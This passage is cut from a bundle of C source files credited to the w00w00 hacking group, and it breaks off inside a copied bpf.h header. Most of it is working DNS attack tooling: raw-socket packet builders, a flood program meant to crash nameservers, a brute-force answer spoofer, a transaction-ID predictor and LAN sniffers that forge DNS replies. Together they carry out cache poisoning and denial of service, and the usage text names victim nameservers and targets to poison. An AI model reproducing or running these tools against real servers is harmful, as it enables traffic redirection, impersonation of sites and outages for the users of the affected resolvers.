9999999; *((u_short *) (data+i+8)) = htons(4); *((u_long *) (data+i+10)) = host2ip(ip); return(i+14); } if (type == TYPE_PTR) { nameformat(name, tmp); nameformatIP(ip, data); *((u_short *) (data+strlen(data)+1)) = htons(TYPE_PTR); *((u_short *) (data+strlen(data)+3)) = htons(1); i = strlen(data)+5; strncpy((data+i), data, MAXLEN); i = (i+strlen(data)+1); *((u_short *) (data+i)) = htons(TYPE_PTR); *((u_short *) (data+i+2)) = htons(1); *((u_long *) (data+i+4)) = 9999999; *((u_short *) (data+i+8)) = htons(strlen(tmp)+1); strncpy((data+i+10), tmp, MAXLEN); return(i+10+strlen(tmp)+1); } /* You were only supposed to use type A or PTR! Bad people. */ return(ERROR); } void sendquestion(u_long s_ip, u_long d_ip,char *name,int type) { int i; int on=1; int sraw; char *data; char buff[1024]; struct dnshdr *dns; sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (sraw == ERROR) { perror("socket"); exit(ERROR); } if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) { perror("setsockopt"); exit(ERROR); } dns = (struct dnshdr *) buff; data = (char *)(buff+DNSHDRSIZE); bzero(buff, sizeof(buff)); dns->id = 6000+myrand(); dns->qr = 0; dns->rd = 1; dns->aa = 0; dns->que_num = htons(1); dns->rep_num = htons(0); i = makepacketQS(data, name, type); udp_send(sraw, s_ip, d_ip, 1200+myrand, 53, buff, DNSHDRSIZE+i); close(sraw); } void sendanswer(s_ip, d_ip, name, spoofip, ID, type) u_long s_ip; u_long d_ip; char *name; char *spoofip; int ID; int type; { int i; int on=1; int sraw; char *data; char buff[1024]; struct dnshdr *dns; sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (sraw == ERROR) { perror("socket"); exit(ERROR); } if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) { perror("setsockopt"); exit(ERROR); } dns = (struct dnshdr *) buff; data = (char *)(buff+DNSHDRSIZE); bzero(buff, sizeof(buff)); dns->id = htons(ID); dns->qr = 1; dns->rd = 1; dns->aa = 1; dns->que_num = htons(1); dns->rep_num = htons(1); i = makepacketAW(data, name, spoofip, type); udp_send(sraw, s_ip, d_ip, 53, 53, buff, DNSHDRSIZE+i); close(sraw); } void dnsspoof(dnstrust, victim, spoofname, spoofip, ID, type) char *dnstrust; char *victim; char *spoofname; char *spoofip; int ID; int type; { int loop, rere; u_long fakeip, trustip, victimip; char *data; char buff[1024]; struct dnshdr *dns; dns = (struct dnshdr *)buff; data = (char *)(buff+DNSHDRSIZE); trustip = host2ip(dnstrust); victimip = host2ip(victim); fakeip = host2ip("12.1.1.0"); /* send question ... */ if (type == TYPE_PTR) for (loop = 0; loop < 4; loop++) sendquestion(fakeip, victimip, spoofip, type); if (type == TYPE_A) for (loop = 0; loop < 4; loop++) sendquestion(fakeip, victimip, spoofname, type); /* Answer quickly! */ for (rere = 0; rere < 2; rere++) for (loop = 0; loop < 80; loop++) { printf("trustip: %s, vitcimip: %s, spoofname: %s, spoofip: %s," "ID: %i, type: %i\n", dnstrust, victim, spoofname, spoofip, ID+loop, type); sendanswer(trustip, victimip, spoofname, spoofip, ID+loop, type); } } ----[END of WSD-DNS2.c]---- ----[WSD-baddns.c ]---- /* ******************************************************* */ /* w00w00 DNS attack (Denial of Service) */ /* w00w00 Security Development (WSD) */ /* ------------------------------------------------------- */ /* Email: WSD@w00w00.org */ /* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */ /* ******************************************************* */ #include "WSD-spoof.c" #include "dns.h" #include "WSD-DNS2.c" #define ERROR -1 #define VERSION "v0.2" #define DNSHDRSIZE 12 void main(int argc, char **argv) { int sraw, on = 1; unsigned long s_ip, d_ip; char *data; char buf[4000]; unsigned char names[255]; struct dnshdr *dns; printf("w00w00!\n"); if (argc < 2) { printf("Usage: %s \n", argv[0]); printf("w00w00 DNS Attack - WSD@w00w00.org\n"); exit(0); } dns = (struct dnshdr *)buf; data = (char *)(buf+12); bzero(buf, sizeof(buf)); sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (sraw == ERROR) { perror("socket"); exit(ERROR); } if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) { perror("setsockopt"); exit(ERROR); } printf("WSD-baddns %s: DNS attack - w00w00 Security Development (WSD)\n", VERSION); sleep(1); s_ip = host2ip("100.1.2.3"); d_ip = host2ip(argv[1]); dns->id = 123; dns->rd = 1; dns->que_num = htons(1); while(1) { sprintf(names, "\3%d\3%d\3%d\3%d\07in-addr\04arpa", myrand(), myrand(), myrand(), myrand()); printf("%s\n", names); strcpy(data, names); *((u_short *) (data+strlen(names)+1)) = ntohs(12); *((u_short *) (data+strlen(names)+3)) = ntohs(1); udp_send(sraw, s_ip, d_ip, 2600+myrand(), 53, buf, 14+strlen(names)+5); s_ip = ntohl(s_ip); s_ip++; s_ip = htonl(s_ip); } } ----[END of WSD-baddns.c]---- ----[WSDkillDNS.c ]---- /* *********************************************** */ /* w00w00 DNS Killer (Brutal attack) */ /* ----------------------------------------------- */ /* Email: WSD@w00w00.org */ /* WWW: http://www.w00w00.org */ /* FTP: ftp://ftp.w00w00.org/pub */ /* *********************************************** */ #include "WSD-spoof.c" #include "dns.h" #include "WSD-DNS2.c" #define ERROR -1 #define ID_START 1 #define ID_STOP 65535 #define VERSION "v0.3" #define PORT_START 53 #define PORT_STOP 54 void main(int argc, char **argv) { struct dnshdr *dns; char *data; char buffer2[4000]; unsigned char names[255]; unsigned long s_ip, s_ip2; unsigned long d_ip, d_ip2; int sraw, i, on=1, x, loop; int idstart, idstop, portstart, portstop; printf("w00w00!\n"); printf("w00w00 Security Development (WSD)\n"); printf("WSD@w00w00.org\n"); if (argc < 5) { system("/usr/bin/clear"); printf("w00w00!\n"); printf("w00w00 Security Development (WSD)\n"); printf("WSD@w00w00.org\n\n"); printf(" Usage : %s \n\t[A,B,N] [ID_START] [ID_STOP] [PORT START] [PORT STOP] \n",argv[0]); printf(" ip src: ip source of the dns anwser\n"); printf(" ip dst: ip of the dns victim\n"); printf(" name : spoof name i.e.: www.dede.com\n"); printf(" ip : the ip associated with the name\n"); printf(" options:\n"); printf(" [A,B,N]...\n"); printf(" A: flood the DNS victim with multiple queries\n"); printf(" B: DoS attack to crash the DNS\n"); printf(" N: No attacks\n\n"); printf(" [ID_START] \n"); printf(" ID_START: id start :> \n\n"); printf(" [ID_STOP] n"); printf(" ID_STOP : id stop :> \n\n"); printf(" PORT START, PORT STOP: send the spoof to the portstart at portstop\n\n"); exit(ERROR); } dns = (struct dnshdr *)buffer2; data = (char *)(buffer2+DNSHDRSIZE); bzero(buffer2, sizeof(buffer2)); sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (sraw == ERROR) { perror("socket"); exit(ERROR); } if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ perror("setsockopt"); exit(ERROR); } printf("WSDkillDNS %s \n", VERSION); s_ip2 = s_ip = host2ip(argv[1]); d_ip2 = d_ip = host2ip(argv[2]); if (argc > 5) if (*argv[5]=='A') for (loop=0; loop < 10; loop++) { dns->id = 6000+loop; dns->qr = 0; dns->rd = 1; dns->aa = 0; dns->que_num = htons(1); dns->rep_num = htons(0); i = makepacketQS(data, argv[3], TYPE_A); udp_send(sraw, s_ip, d_ip, 1200+loop, 53, buffer2, DNSHDRSIZE+i); s_ip = ntohl(s_ip); s_ip++; s_ip = htonl(s_ip); } if (argc > 5) if (*argv[5]=='B') { s_ip = host2ip("100.1.2.3"); dns->id = 123; dns->rd = 1; dns->que_num = htons(1); printf("Enter the number of packets to send: "); scanf("%d",&i); for (x = 0; x < i; x++) { sprintf(names, "\3%d\3%d\3%d\3%d\07in-addr\04arpa", myrand(), myrand(), myrand(), myrand()); strcpy(data, names); *((u_short *) (data+strlen(names)+1)) = ntohs(12); *((u_short *) (data+strlen(names)+3)) = ntohs(1); udp_send(sraw, s_ip, d_ip, 2600+myrand(), 53, buffer2, 14+strlen(names)+5); s_ip = ntohl(s_ip); s_ip++; s_ip = htonl(s_ip); printf("send packet # %i:%i\n", x, i); } } if (argc > 6) idstart = atoi(argv[6]); else idstart = ID_START; if (argc > 7) idstop = atoi(argv[7]); else idstop = ID_STOP; if (argc > 8) { portstart = atoi(argv[8]); portstop = atoi(argv[9]); } else { portstart = PORT_START; portstop = PORT_STOP; } bzero(buffer2, sizeof(buffer2)); bzero(names, sizeof(names)); i = 0 , x = 0; s_ip = s_ip2, d_ip = d_ip2; for (; idstart < idstop; idstart++) { dns->id = htons(idstart); dns->qr = 1; dns->rd = 1; dns->aa = 1; dns->que_num = htons(1); dns->rep_num = htons(1); (void) printf("send awnser with id %i to port %i at port %i\n", idstart, portstart, portstop); i = makepacketAW(data, argv[3], argv[4], TYPE_A); for (; x < portstop; x++) udp_send(sraw, s_ip, d_ip, 53, x, buffer2, DNSHDRSIZE+i); x = portstart; } printf(" terminated..\n"); } ----[END of WSDkillDNS.c ]---- ----[WSD-IDpred.c ]---- /* ******************************************************* */ /* w00w00 DNS ID Predictor Super Raw */ /* ------------------------------------------------------- */ /* Email: WSD@w00w00.org */ /* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */ /* ******************************************************* */ #include #include "dns.h" #include "WSD-spoof.c" #include "WSD-DNS2.c" #define ERROR -1 #define DNSHDRSIZE 12 #define TIMEOUT 300 #define VERSION "v0.7" #define SPOOFIP "4.4.4.4" #define UNDASPOOF "111.111.111.111" #define LEN sizeof(struct sockaddr) void usage() { printf("w00w00 DNS ID Predictor\n"); printf("w00w00 Security Development (WSD)\n"); printf("WSD@w00w00.org\n"); printf(" WSD-idpred [ID] \n"); printf("\n Ex: WSD-idpred ppp.evil.com ns1.victim.com provnet.fr ns.victim.com 1 mouhhahahaha.hol.fr 31.3.3.7 ns.isdnet.net [ID] \n"); printf(" We are going to poison ns.victim.com so they resolve mouhhahaha.hol.fr in 31.3.3.7\n"); printf(" We use provnet.fr and ns1.provnet for finding the ID of ns.victim.com\n"); printf(" We use ns.isdnet.net for spoofing because they have AUTH on *.hol.fr\n"); printf(" For more information check ftp.w00w00.org/pub/DNS/\n"); printf(" Mail WSD@w00w00.org.\n"); exit(ERROR); } void senddnspkt(s, d_ip, wwwname, ip, dns) int s; u_long d_ip; char *wwwname; char *ip; struct dnshdr *dns; { int i; char buffer[1024]; char *data = (char *)(buffer+DNSHDRSIZE); struct sockaddr_in sin; bzero(buffer, sizeof(buffer)); memcpy(buffer, dns, DNSHDRSIZE); if (dns->qr == 0) { i = makepacketQS(data, wwwname, TYPE_A); sin.sin_family = AF_INET; sin.sin_port = htons(53); sin.sin_addr.s_addr = d_ip; sendto(s, buffer, DNSHDRSIZE+i, 0, (struct sockaddr *)&sin, LEN); } else { i = makepacketAW(data, wwwname, ip, TYPE_A); sin.sin_family = AF_INET; sin.sin_port = htons(53); sin.sin_addr.s_addr = d_ip; sendto(s, buffer, DNSHDRSIZE+i, 0, (struct sockaddr *)&sin, LEN); } } void dns_qs_no_rd(s, d_ip, wwwname, ID) int s; u_long d_ip; char *wwwname; int ID; { int i; char *data; char buffer[1024]; struct dnshdr *dns; dns = (struct dnshdr *)buffer; data = (char *)(buffer+DNSHDRSIZE); bzero(buffer, sizeof(buffer)); dns->id = htons(ID); dns->qr = 0; dns->rd = 0; /* dont want the recursion !! */ dns->aa = 0; dns->que_num = htons(1); dns->rep_num = htons(0); i = makepacketQS(data, wwwname, TYPE_A); senddnspkt(s, d_ip, wwwname, NULL, dns); } void main(int argc, char **argv) { struct sockaddr_in sin_rcp; struct dnshdr *dns, *dns_recv; int len = sizeof(struct sockaddr); int sraw, s_r, i, on = 1, x, ID, times; char *alacon; char host[256]; char dnstrust[256]; char *data, *data2; char buf[4000], buf1[4000]; char spoofname[256], spoofip[256]; unsigned char fakename[256]; unsigned char names[256]; unsigned long s_ip, s_ip2; unsigned long d_ip, d_ip2, trust; unsigned int DA_ID = 65535, loop = 65535; dns_recv = (struct dnshdr *)(buf1); data2 = (char *)(buf1+DNSHDRSIZE); dns = (struct dnshdr *)buf; data = (char *)(buf+DNSHDRSIZE); bzero(buf, sizeof(buf)); srand(time(NULL)); printf("w00w00 DNS ID Predictor\n"); printf("w00w00 Security Development (WSD)\n"); printf("WSD@w00w00.org\n"); s_r = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if (s_r == ERROR) { perror("socket"); exit(ERROR); } if ((fcntl(s_r, F_SETFL, O_NONBLOCK)) == ERROR) { perror("fcntl"); exit(ERROR); } sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (sraw == ERROR) { perror("socket"); exit(ERROR); } if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == ERROR)) { perror("setsockopt"); exit(ERROR); } if (argc < 2) usage(); if (argc > 9) DA_ID = loop = atoi(argv[9]); if (argc > 6) { if (strlen(argv[6]) > sizeof(spoofname) - 1) { fprintf(stderr, "argv[6] too long: %s\n", argv[6]); exit(ERROR); } else strcpy(spoofname, argv[6]); } else { printf("Enter the name you want spoof: "); scanf("%255s", spoofname); } if (argc > 7) strncpy (host, argv[7], sizeof(host)); else { printf("Enter the IP address of the spoof name: "); scanf("%255s", host); } alacon = (char *)inet_ntoa(host2ip(host)); strcpy(spoofip, alacon); if (argc > 8) { if (strlen(argv[8]) > sizeof(host) - 1) { fprintf(stderr, "argv[8] too long: %s\n", argv[8]); exit(ERROR); } else strcpy(host, argv[8]); } else { printf("Enter the trusted NS of the victim: "); scanf("%255s", host); } alacon = (char *)inet_ntoa(host2ip(host)); strcpy(dnstrust, alacon); printf("WSD-IDpred %s w00w00 (WSD) - Super Raw\n", VERSION); /* save some arguments */ s_ip2 = host2ip(argv[1]); trust = host2ip(argv[2]); s_ip = host2ip(UNDASPOOF); d_ip2 = d_ip = host2ip(argv[4]); if (strlen(argv[3]) > sizeof(fakename) - 1) { fprintf(stderr, "argv[3] too long: %s\n", argv[3]); exit(ERROR); } while(1) { sprintf(fakename, "%d%d%d%d%d%d.%s", myrand(), myrand(), myrand(), myrand(), myrand(), myrand(), argv[3]); sendquestion(s_ip, d_ip, fakename, TYPE_A); /* end of question packet */ bzero(buf, sizeof(buf)); /* re-init some variable */ bzero(names, sizeof(names)); i = 0, x = 0; /* Here we start the spoof anwser */ ID = loop; for (; loop >= ID-10; loop--) { dns->id = htons(loop); dns->qr = 1; dns->rd = 1; dns->aa = 1; dns->que_num = htons(1); dns->rep_num = htons(1); i = makepacketAW(data, fakename, SPOOFIP, TYPE_A); udp_send(sraw, trust, d_ip2, 53, 53, buf, DNSHDRSIZE+i); } bzero(buf, sizeof(buf)); /* re-init some variable */ bzero(names, sizeof(names)); i = 0, x = 0; /* Time for the test spoof */ /* Here we sending question, nonrecursive */ dns_qs_no_rd(s_r, d_ip2, fakename, myrand()); /* We are waiting for answer ... */ while (1) { for (times = 0; times < TIMEOUT; times++) { if (recvfrom(s_r, buf1, sizeof(buf1), 0, (struct sockaddr *)&sin_rcp,&len) != ERROR) { printf("We have the response.\n"); times = 0; break; } usleep(10); times++; } if (times != 0) { printf("We have no response from the NS. Resend question..\n"); dns_qs_no_rd(s_r, d_ip2, fakename, myrand()); } else break; } /* Okay we have an answer */ printf("fakename = %s\n", fakename); if (sin_rcp.sin_addr.s_addr == d_ip2) if (sin_rcp.sin_port == htons(53)) if (dns_recv->qr == 1) { if (dns_recv->rep_num == 0) /* We dont have the right ID */ printf("Try %d < ID < %d\n", ID-10, ID); else { /* The spoof has worked, we have found the right ID! */ printf("the DNS ID of %s is %d < ID < %d!!\n", argv[4], loop-10, loop); printf("Let's send the spoof...\n"); dnsspoof(dnstrust, argv[4], spoofname, spoofip, loop, atoi(argv[5])); printf("spoof sent...\n"); exit(0); } } bzero(buf1, sizeof(buf1)); } } ----[END of WSD-IDpred.c]---- ----[ WSDspoofID.c ]---- /* ******************************************************* */ /* w00w00 DNS ID Spoofer Super Raw */ /* w00w00 Security Development (WSD) */ /* ------------------------------------------------------- */ /* Email: WSD@w00w00.org */ /* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */ /* ******************************************************* */ #include "WSD-spoof.c" #include "dns.h" #include "WSD-DNS2.c" #include #include #define ERROR -1 #define DNSHDRSIZE 12 #define VERSION "v0.6" #define SPOOF "127.0.0.1" int ETHHDRSIZE; void main(int argc, char **argv) { int sraw, i, on=1, con, ID, DA_ID, type; struct iphdr *ip; struct udphdr *udp; struct dnshdr *dnsrecv, *dnssend; struct pcap *pcap_d; struct pcap_pkthdr h; char *buf; char *alacon; char host[256]; char ebuf[256]; char buf1[1024]; char namefake[256]; char dnstrust[256]; char *data, *data2; char spoofip[256], spoofname[256]; unsigned long d_ip; unsigned long s_ipns; srand((time(NULL) % random() * random())); printf("w00w00 DNS ID Spoofer - Super Raw!\n"); printf("w00w00 Security Development (WSD)\n"); printf("WSD@w00w00.org\n"); if (argc < 2) { printf("Usage: %s \n",argv[0]); printf("Example: %s eth0 ns.victim.com hacker.org 123.4.5.36 12 damn.diz.ip.iz.ereet.ya mail.provnet.fr ns2.provnet.fr\n",argv[0]); printf(" So... we try to poison victim.com with type 12 (PTR). Now, if someone asked for the ip of mail.provnet.fr they will resolve to damn.diz.ip.iz.ereet.ya\n"); exit(1); } if (strstr(argv[1], "ppp0")) ETHHDRSIZE = 0; else ETHHDRSIZE = 14; if (argc > 5) type = atoi(argv[5]); if (argc > 6) { if (strlen(argv[6]) > sizeof(spoofname) - 1) { fprintf(stderr, "argv[6] too long: %s\n", argv[6]); exit(ERROR); } else strcpy(spoofname, argv[6]); } else { printf("Enter the name you want to spoof: "); scanf("%255s", spoofname); } if (argc > 7) { if (strlen(argv[7]) > sizeof(host) - 1) { fprintf(stderr, "argv[7] too long: %s\n", argv[7]); exit(ERROR); } else strcpy(host, argv[7]); } else { printf("Enter the IP of the name to spoof: "); scanf("%255s", host); } alacon = (char *)inet_ntoa(host2ip(host)); strcpy(spoofip, alacon); if (argc > 8) strncpy (host, argv[8], sizeof(host)); else { printf("Enter the trusted dns for the spoof: "); scanf("%255s", host); } alacon = (char *)inet_ntoa(host2ip(host)); strcpy(dnstrust, alacon); dnssend = (struct dnshdr *)buf1; data2 = (char *)(buf1+DNSHDRSIZE); bzero(buf1, sizeof(buf1)); sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (sraw == ERROR) { perror("socket"); exit(ERROR); } if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) { perror("setsockopt"); exit(ERROR); } printf("WSDspoofID.c %s w00w00 ID sniffer\n", VERSION); printf("w00w00 Security Development\n"); sleep(1); pcap_d = pcap_open_live(argv[1],1024,0,100,ebuf); s_ipns = host2ip(argv[4]); d_ip = host2ip(argv[2]); con = myrand(); /* Make the question to get the ID */ sprintf(namefake, "%d%d%d.%s", myrand(), myrand(), myrand(), argv[3]); dnssend->id = 2600; dnssend->qr = 0; dnssend->rd = 1; dnssend->aa = 0; dnssend->que_num = htons(1); dnssend->rep_num = htons(0); i = makepacketQS(data2, namefake, TYPE_A); udp_send(sraw, s_ipns, d_ip,2600+con, 53, buf1, DNSHDRSIZE+i); printf("Question sent...please wait\n"); while(1) { buf = (u_char *)pcap_next(pcap_d,&h); /* catch the packet */ ip = (struct iphdr *)(buf+ETHHDRSIZE); udp = (struct udphdr *)(buf+ETHHDRSIZE+IPHDRSIZE); dnsrecv = (struct dnshdr *)(buf+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE); data = (char *)(buf+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE); if (ip->protocol == IPPROTO_UDP) { printf("[%s:%d ->", (char *)inet_ntoa(ip->saddr), ntohs(udp->source)); printf("%s:%d]\n", (char *)inet_ntoa(ip->daddr), ntohs(udp->dest)); } if (ip->protocol == 17) if (ip->saddr.s_addr == d_ip) if (ip->daddr.s_addr == s_ipns) if (udp->dest == htons(53)) if (dnsrecv->qr == 0) { printf("We have the packet!\n"); ID = dnsrecv->id; /* We have the id. */ printf("the current id of %s is %d \n", argv[2], ntohs(ID)); DA_ID = ntohs(ID); printf("Sending the spoof...\n"); dnsspoof(dnstrust, argv[2], spoofname, spoofip, DA_ID,type); printf("Spoof sent...\n"); exit(0); } } } ----[END of WSDspoofID.c ]---- ----[WSDsniffID.c]---- /* ******************************************************* */ /* w00w00 LAN ID Sniffer Super Raw */ /* ------------------------------------------------------- */ /* w00w00 Security Development (WSD) */ /* Email: WSD@w00w00.org */ /* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */ /* ******************************************************* */ #include #include "WSD-spoof.c" #include "dns.h" #include "WSD-DNS2.c" #define ERROR -1 #define DNSHDRSIZE 12 #define VERSION "v0.4" int ETHHDRSIZE; void usage() { printf("Usage: WSDsniffID \n"); printf("Example: WSDsniffID eth0 \"127.0.0.1\" \"www.its.me.com\"\n"); printf("Raw-Powa (WSD)\n"); exit(ERROR); } void main(int argc, char **argv) { int sraw, on = 1, tmp1, type; char *buffer; char *data, *data2; struct pcap *pcap_d; struct pcap_pkthdr h; struct iphdr *ip; struct udphdr *udp; struct dnshdr *dnsrecv, *dnssend; char host[255]; char tmp2[255]; char ebuf[255]; char buffer2[1024]; char spoofip[255], spoofname[255]; unsigned char names[255]; printf("w00w00 LAN ID SNIFFER! Super Raw\n"); printf("w00w00 Security Development (WSD)\n"); printf("WSD@w00w00.org\n"); if (argc < 2) usage(); if (strstr(argv[1], "ppp0")) ETHHDRSIZE = 0; else ETHHDRSIZE = 14; if (strlen(argv[2]) > sizeof(spoofip) - 1) { fprintf(stderr, "argv[2] too long: %s\n", argv[2]); exit(ERROR); } if (strlen(argv[3]) > sizeof(spoofip) - 1) { fprintf(stderr, "argv[3] too long: %s\n", argv[3]); exit(ERROR); } strcpy(spoofip, argv[2]); strcpy(spoofname, argv[3]); type = atoi(argv[4]); dnssend = (struct dnshdr *)buffer2; data2 = (char *)(buffer2+12); bzero(host, sizeof(host)); bzero(buffer2, sizeof(buffer2)); sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (sraw == ERROR) { perror("socket"); exit(ERROR); } if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) { perror("setsockopt"); exit(ERROR); } /* open pcap descriptor */ pcap_d = pcap_open_live(argv[1], sizeof(buffer), 0, 100, ebuf); while(1) { buffer = (u_char *)pcap_next(pcap_d,&h); /* catch the packet */ ip = (struct iphdr *)(buffer+ETHHDRSIZE); udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE); dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE); data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE); if (ip->protocol == 17) if (udp->dest == htons(53)) if (dnsrecv->qr == 0) { strcpy(names, data); nameformat(names, host); printf("We have a DNS question from %s, which wants: %s!\n", (char *)inet_ntoa(ip->saddr), host); bzero(host, sizeof(host)); printf("The question has a type %d " "and type of the query is %d\n", ntohs(*((u_short *)(data+strlen(data)+1))), ntohs(*((u_short *)(data+strlen(data)+2+1)))); printf("Making the spoofed packet...\n"); /* Here we are going to start making the spoofed packet */ memcpy(dnssend, dnsrecv, DNSHDRSIZE+strlen(names)+5); dnssend->id=dnsrecv->id; /* The ID */ dnssend->aa=1; /* I have the authority */ dnssend->ra=1; /* I have the recusion */ dnssend->qr=1; /* It's an answer */ dnssend->rep_num = htons(1); /* I have one awnser */ printf("ID = %d, Number of question = %d, " "number of anwser = %d\n", dnssend->id, ntohs(dnssend->que_num), ntohs(dnssend->rep_num)); printf("Question..\n"); printf("domainename = %s\n", data2); printf("type of question = %d\n", ntohs(*((u_short *)(data2+strlen(names)+1)))); printf("type of query = %d\n", ntohs(*((u_short *)(data2+strlen(names)+1+2)))); if (type == TYPE_PTR) { tmp1 = strlen(names)+5; strcpy(data2+tmp1, names); tmp1 = tmp1+strlen(names)+1; bzero(tmp2, sizeof(tmp2)); nameformat(spoofname, tmp2); *((u_short *)(data2+tmp1)) = htons(TYPE_PTR); *((u_short *)(data2+tmp1+2)) = htons(1); *((u_long *)(data2+tmp1+2+2)) = htonl(86400); *((u_short *)(data2+tmp1+2+2+4)) = htons(strlen((tmp2)+1)); strcpy((data2+tmp1+2+2+4+2), tmp2); tmp1 = tmp1 +strlen(tmp2)+ 1; } if (type == TYPE_A) { tmp1 = strlen(names)+5; strcpy(data2+tmp1, names); tmp1 = tmp1+strlen(names)+1; *((u_short *)(data2+tmp1)) = htons(TYPE_A); *((u_short *)(data2+tmp1+2)) = htons(1); *((u_long *)(data2+tmp1+2+2)) = htonl(86400); *((u_short *)(data2+tmp1+2+2+4)) = htons(4); *((u_long *)(data2+tmp1+2+2+4+2)) = host2ip(spoofip); } printf("Answer..\n"); printf("domainname = %s\n", tmp2); printf("type = %d\n", ntohs(*((u_short *)(data2+tmp1)))); printf("classe = %d\n", ntohs(*((u_short *)(data2+tmp1+2)))); printf("time to live = %lu\n", ntohl(*((u_long *)(data2+tmp1+2+2)))); printf("resource data length = %d\n", ntohs(*((u_short *)(data2+tmp1+2+2+4)))); printf("IP = %s\n", (char *)inet_ntoa(*((u_long *)(data2+tmp1+2+2+4+2)))); /* Now tmp1 == the total length of packet dns without the */ /* dnshdr. */ tmp1 = tmp1+2+2+4+2+4; udp_send(sraw, ip->daddr, ip->saddr, ntohs(udp->dest), ntohs(udp->source), buffer2, DNSHDRSIZE+tmp1); } } } ----[END of WSDsniffID.c ]---- ----[udp.h ]---- struct udphdr { u_short source; /* source port */ u_short dest; /* destination port */ u_short len; /* udp length */ u_short check; /* udp checksum */ }; ----[END of udp.h]---- ----[ dns.h ]---- #define DNSHDRSIZE 12 struct dnshdr { unsigned short int id; unsigned char rd:1; unsigned char tc:1; unsigned char aa:1; unsigned char opcode:4; unsigned char qr:1; unsigned char rcode:4; unsigned char unused:2; unsigned char pr:1; unsigned char ra:1; unsigned short int que_num; unsigned short int rep_num; unsigned short int num_rr; unsigned short int num_rrsup; }; ----[ END of dns.h ]---- ----[ ip.h ]---- /* adapted from tcpdump */ #ifndef IPVERSION #define IPVERSION 4 #endif /* IPVERISON */ struct iphdr { u_char ihl:4, /* header length */ version:4; /* version */ u_char tos; /* type of service */ short tot_len; /* total length */ u_short id; /* identification */ short off; /* fragment offset field */ #define IP_DF 0x4000 /* dont fragment flag */ #define IP_MF 0x2000 /* more fragments flag */ u_char ttl; /* time to live */ u_char protocol; /* protocol */ u_short check; /* checksum */ struct in_addr saddr, daddr; /* source and dest address */ }; #ifndef IP_MAXPACKET #define IP_MAXPACKET 65535 #endif /* IP_MAXPACKET */ ----[ END of ip.h ]---- ----[bpf.h]---- /*- * Copyright (c) 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 * The Regents of the University of California. All rights reserved. * * This code is derived from the Stanford/CMU enet packet filter, * (net/enet.c) distributed as part of 4.3BSD, and code contributed * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence * Berkeley Laboratory. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)bpf.h 7.1 (Berkeley) 5/7/91 * * @(#) $Header: bpf.h,v 1.36 97/06/12 14:29:53 leres Exp $ (LBL) */ #ifndef BPF_MAJOR_VERSION /* BSD style release date */ #define BPF_RELEASE 199606 typedef int bpf_int32; typedef u_int bpf_u_int32; /* * Alignment macros. BPF_WORDALIGN rounds up to the next * even multiple of BPF_ALIGNMENT. */ #define BPF_ALIGNMENT sizeof(bpf_int32) #define BPF_WORDALIGN(x) (((x)+(BPF_ALIGNMENT-1))&~(BPF_ALIGNMENT-1)) #define BPF_MAXINSNS 512 #define BPF_MAXBUFSIZE 0x8000 #define BPF_MINBUFSIZE 32 /* * Structure for BIOCSETF. */ struct bpf_program { u_int bf_len; struct bpf_insn *bf_insns; }; /* * Struct returned by BIOCGSTATS. */ struct bpf_stat { u_int bs_recv; /* number of packets received */ u_int bs_drop; /* number of packets dropped */ }; /* * 